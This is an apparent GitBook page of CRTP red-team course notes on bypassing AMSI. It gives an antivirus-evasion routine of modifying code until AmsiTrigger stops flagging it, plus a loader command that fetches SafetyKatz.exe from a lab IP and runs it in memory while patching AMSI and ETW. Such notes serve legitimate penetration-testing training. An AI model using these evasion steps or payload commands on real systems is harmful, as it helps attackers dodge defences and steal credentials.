CRTP Certified Red Team Professional
AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA
  • 👨‍🚒Certified Red Team Professional
  • LAB Access
  • 🔥Assume Breach Execution Cycle
  • 😆Prepare your VM
    • 😅PowerShell Detections
    • 🔥AMSI Bypass
    • 🙃Tools
    • CMD Commands
    • 🤣Escape the Machine
  • Data Visualization
    • BloodHound
    • AzureHound
    • RustHound
  • Domain Enumeration
    • 1️⃣Tools
    • 2️⃣Domain Enumeration
    • 3️⃣Users, Groups, Computers Enumeration
    • 4️⃣Shares Enumeration
    • 5️⃣GPO Enumeration
    • 6️⃣ACLs Enumeration
    • 7️⃣Domain Trusts
    • Domain Forests
    • 9️⃣Miscellaneous Enumeration
    • User Hunting
  • Local Privilege Escalation
    • Theory
    • Automation Tools
    • Techniques
  • Lateral Movement
    • Thinking
    • WinRS
    • PowerShell Remoting
    • Invoke-MimiKatz
    • CrackMapExec
  • Domain Persistence
    • 🔥Golden tickets
    • 🥈Silver Tickets
    • 💎Diamond Tickets
    • 🚒Skeleton Keys
    • DSRM
    • Custom SSP - Track logons
    • ACLs
      • 1️⃣AdminSDHolder
      • 2️⃣DCsync
      • 3️⃣WMI
      • 4️⃣Remote Powershell
      • 5️⃣Remote Registry
  • Domain Privilege Escalation
    • 🟢Kerberoast
    • 🟢AS-REPS Roasting
    • 🟢Set SPN
    • 🟢Unconstrained Delegation
    • 🟢Constrained Delegation
    • 🟢DNS Admins
    • Enterprise Admins
      • Child to parent - Trust tickets
      • Child to parent - krbtgt hash
    • 🟢Crossforest attacks
    • AD CS
    • 🟢Abuse MSSQL Servers
Powered by GitBook
On this page
  • Bypass Defences On-Memory
  • Bypass Defences On-Disk
  • Payload Delivery

Was this helpful?

  1. Prepare your VM

AMSI Bypass

Explore an insightful article about CRTP AMSI Bypass - a key technique in cybersecurity. This piece delves into its design, functionality, and crucial role in securing network infrastructures.

PreviousPowerShell DetectionsNextTools

Last updated 1 year ago

Was this helpful?

Bypass Defences On-Memory

Bypass Defences On-Disk

AmsiTrigger_x64.exe -i C: AD Tools Invoke PowerShellTcp_Detected.ps1 DefenderCheck.exe PowerUp.ps1

Steps to avoid signature-based detection are pretty simple:

1) Scan using AMSITrigger

2) Modify the detected code snippet

3) Rescan using AMSITrigger

4) Repeat steps 2 & 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “BLANK"

Payload Delivery

It can be used to load binary from file path or URL and patch AMSI & ETW while executing.

C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe

Summary of Bypassing Defence Mechanisms

To evade on-memory and on-disk defences, the process involves iteratively modifying and scanning scripts or executables to evade signature-based detection tools like AMSITrigger. The goal is to continue the cycle of modification and rescanning until tools like AMSITrigger no longer detect the code, indicating a successful bypass.

  • On-Memory Bypass Routine:

    1. Execute AMSITrigger to identify detectable code.

    2. Alter the code flagged by AMSITrigger.

    3. Rescan with AMSITrigger post-modification.

    4. Repeat until "AMSI_RESULT_NOT_DETECTED" appears.

  • Delivery of Payload:

    A loader can be utilized for delivering a payload, which involves fetching and executing a binary from either a local path or a remote URL. Consequently, the binary can patch both AMSI and ETW, helping the payload to avoid detection during execution. A typical command for this operation follows the format:

    Loader.exe -path <binary_source>
😆
🔥
AMSITrigger
DefenderCheck
Invoke-Obfuscation
GitHub - Flangvik/NetLoader: Loads any C# binary in mem, patching AMSI + ETW.GitHub
Page cover image
Logo